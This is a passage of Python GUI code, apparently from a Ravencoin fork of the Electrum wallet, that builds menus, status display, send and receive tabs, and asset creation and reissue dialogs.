# tools_menu.addAction(_("&Log viewer"), self.logview_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction("&RVN Electrum Wiki", lambda: webopen("https://raven.wiki/wiki/Electrum"))
help_menu.addAction("&GetRavencoin.org", lambda: webopen("https://GetRavencoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(
QKeySequence.HelpContents)
# if not constants.net.TESTNET:
# help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('raven:%s?message=donation for %s' % (d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version") + " %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Ravencoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Ravencoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = RavenValue()
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
recv = ''
rvn = total_amount.rvn_value
assets = total_amount.assets
recv += self.format_amount_and_units(rvn)
if assets:
recv += ', '
assets = ['{}: {}'.format(asset, self.config.format_amount(val)) for asset, val in assets.items()]
recv += ', '.join(assets)
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), recv))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
recv = ''
rvn = tx_wallet_delta.delta.rvn_value
assets = tx_wallet_delta.delta.assets
recv += self.format_amount_and_units(rvn)
if assets:
recv += ', '
assets = ['{}: {}'.format(asset, self.config.format_amount(val)) for asset, val in assets.items()]
recv += ', '.join(assets)
self.notify(_("New transaction: {}").format(recv))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
self.request_list.refresh_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat: int, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
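    # Keep an amount edit and its fiat counterpart in sync: editing either field
    # recomputes the other from the current exchange rate; the 'follows' flag
    # prevents the textChanged handlers from triggering each other recursively.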
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
status_text = ''
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            local_height = self.network.get_local_height()
            server_height = self.network.get_server_height()
            server_lag = local_height - server_height
fork_str = "_fork" if len(self.network.get_blockchains()) > 1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
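            # While headers are still syncing, keep the header tracker's stats updated;
            # once we are within 100 headers of the server tip, mark it finished and
            # remove the widget to free memory.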
if self.header_tracker:
if server_height < local_height + 100:
self.header_tracker.setVisible(True)
self.header_tracker.finished()
# Clean up memory
self.history_tab_layout.removeWidget(self.header_tracker)
self.header_tracker.deleteLater()
self.header_tracker = None
else:
self.header_tracker.calculate_stats(local_height, server_height)
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Syncing transactions..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png" % fork_str)
else:
c, u, x = self.wallet.get_balance()
c, u, x = c.rvn_value, u.rvn_value, x.rvn_value
text = _("Balance") + ": %s " % (self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]" % (self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]" % (self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s' % (self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png" % fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png" % fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_label.setText(status_text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.asset_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
# self.channels_list.update_rows.emit(wallet)
self.update_completions()
self.refresh_send_tab()
        if self.wallet.wallet_type not in ('imported', 'xpub'):
self.create_workspace.refresh_owners()
self.reissue_workspace.refresh_owners()
# def create_channels_tab(self):
# self.channels_list = ChannelsList(self)
# t = self.channels_list.get_toolbar()
# return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_asset(self, asset):
from . import asset_dialog
d = asset_dialog.AssetDialog(self, asset)
d.exec_()
def hide_asset(self, asset):
self.asset_blacklist.append('^' + asset + '$')
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
self.asset_list.update()
self.history_model.refresh('Marked asset as spam')
self.history_list.update()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = FreezableLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = RVNAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
#self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'),
' ',
_('The ravencoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a ravencoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("ravencoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(
_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def refresh_send_tab(self):
# Don't interrupt if we don't need to
balance = sum(self.wallet.get_balance(), RavenValue())
new_send_options = [util.decimal_point_to_base_unit_name(self.get_decimal_point())] + \
sorted([asset for asset, bal in balance.assets.items() if bal != 0])
diff = set(new_send_options) - set(self.send_options)
if self.send_options and not diff:
return
self.to_send_combo.clear()
self.send_options = new_send_options
self.to_send_combo.addItems(self.send_options)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(1, 1)
from .paytoedit import PayToEdit
# Let user choose to send RVN or Asset
self.to_send_combo = QComboBox()
self.refresh_send_tab()
# self.amount_e = RVNAmountEdit(self.get_decimal_point)
self.amount_e = PayToAmountEdit(self.get_decimal_point,
lambda: self.send_options[self.to_send_combo.currentIndex()][:4])
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n' \
+ _(
'You may enter a Ravencoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Ravencoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n' \
+ _(
'The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
vis = self.config.get('enable_op_return_messages', False)
self.pubkey_e = FreezableLineEdit()
self.pubkey_e.setMaxLength(40) # Maximum length of an OP_RETURN message is 40. 1 byte for message length
self.pubkey_e.setMinimumWidth(700)
msg = _('OP_RETURN message.') + '\n\n' \
+ _('A short message to be encoded in a null pubkey') + ' ' \
+ _(
                  'Note that this is not an intended feature of Ravencoin and may be removed in the future.') + '\n\n' \
+ _('This will increase your fee slightly.')
self.pubkey_label = HelpLabel(_('OP_RETURN Message'), msg)
grid.addWidget(self.pubkey_label, 3, 0)
self.pubkey_label.setVisible(vis)
self.pubkey_e.setVisible(vis)
grid.addWidget(self.pubkey_e, 3, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _(
'Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
grid.addWidget(self.to_send_combo, 4, 2)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 3)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
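        # When switching between RVN and an asset, adjust the amount validator so the
        # allowed decimal places match the asset's divisions, and hide the fiat field
        # for assets (exchange rates only apply to RVN).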
def on_to_send():
i = self.to_send_combo.currentIndex()
self.fiat_send_e.setVisible(i == 0)
if i == 0:
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,8})$')
else:
meta = self.wallet.get_asset_meta(self.send_options[i])
if meta:
divs = meta.divisions
if divs == 0:
reg = QRegExp('^[1-9][0-9]{0,10}$')
else:
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,' + str(divs) + '})$')
else:
# For some reason we don't have asset data yet;
# give the user the most freedom
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,8})$')
validator = QRegExpValidator(reg)
self.amount_e.setValidator(validator)
self.to_send_combo.currentIndexChanged.connect(on_to_send)
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 4)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
# self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def create_messages_tab(self):
from .messages_list import MessageList
self.message_list = l = MessageList(self)
tab = self.create_list_tab(l)
return tab
def create_assets_tab(self):
from .asset_list import AssetList
self.asset_list = l = AssetList(self)
if self.wallet.wallet_type not in ('xpub',):
self.create_workspace = create_w = AssetCreateWorkspace(self,
self.confirm_asset_creation)
self.reissue_workspace = reissue_w = AssetReissueWorkspace(self,
self.confirm_asset_reissue)
else:
self.create_workspace = create_w = QLabel()
self.reissue_workspace = reissue_w = QLabel()
layout = QGridLayout()
w = QWidget()
w.setLayout(layout)
self.asset_tabs = tabwidget = QTabWidget()
tabwidget.addTab(l, "My Assets")
tabwidget.addTab(create_w, "Create Asset")
tabwidget.addTab(reissue_w, "Reissue Asset")
layout.addWidget(tabwidget, 0, 0)
return w
def confirm_asset_reissue(self):
error = self.reissue_workspace.verify_valid()
if error:
self.show_warning(_('Invalid asset metadata:\n'
'{}').format(error))
return
def show_small_association_warning():
if self.reissue_workspace.should_warn_associated_data():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
                goto = self.question(_('Your associated data is smaller than the '
                                       'expected 34 byte size.\n'
                                       'Double check that you have input the correct '
                                       'data.\n'
                                       'If you continue, null bytes will be added '
                                       'to pad your data to this size.\n\n'
                                       'Is this okay?'),
title=_('Warning: Small associated data'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_small_associated', False)
if goto:
return True
else:
return False
else:
return True
def show_non_reissuable_warning():
if self.reissue_workspace.should_warn_on_non_reissuable():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('You will not be able to change '
'this asset in the future.\n'
'Are you sure you want to continue?'),
title=_('Warning: Non reissuable asset'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_non_reissuable', False)
if goto:
return True
else:
return False
else:
return True
if not show_small_association_warning():
return
if not show_non_reissuable_warning():
return
norm, new, change_addr = self.reissue_workspace.get_output()
self.pay_onchain_dialog(
self.get_coins(asset=self.reissue_workspace.get_owner()),
norm,
coinbase_outputs=new,
# change_addr=change_addr
)
self.reissue_workspace.reset_workspace()
def confirm_asset_creation(self):
error = self.create_workspace.verify_valid()
if error:
self.show_warning(_('Invalid asset metadata:\n'
'{}').format(error))
return
def show_small_association_warning():
if self.create_workspace.should_warn_associated_data():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
                goto = self.question(_('Your associated data is smaller than the '
                                       'expected 34 byte size.\n'
                                       'Double check that you have input the correct '
                                       'data.\n'
                                       'If you continue, null bytes will be added '
                                       'to pad your data to this size.\n\n'
                                       'Is this okay?'),
title=_('Warning: Small associated data'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_small_associated', False)
if goto:
return True
else:
return False
else:
return True
def show_non_reissuable_warning():
if self.create_workspace.should_warn_on_non_reissuable():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('You will not be able to change '
'this asset in the future.\n'
'Are you sure you want to continue?'),
title=_('Warning: Non reissuable asset'), checkbox=cb)
if cb_checked:
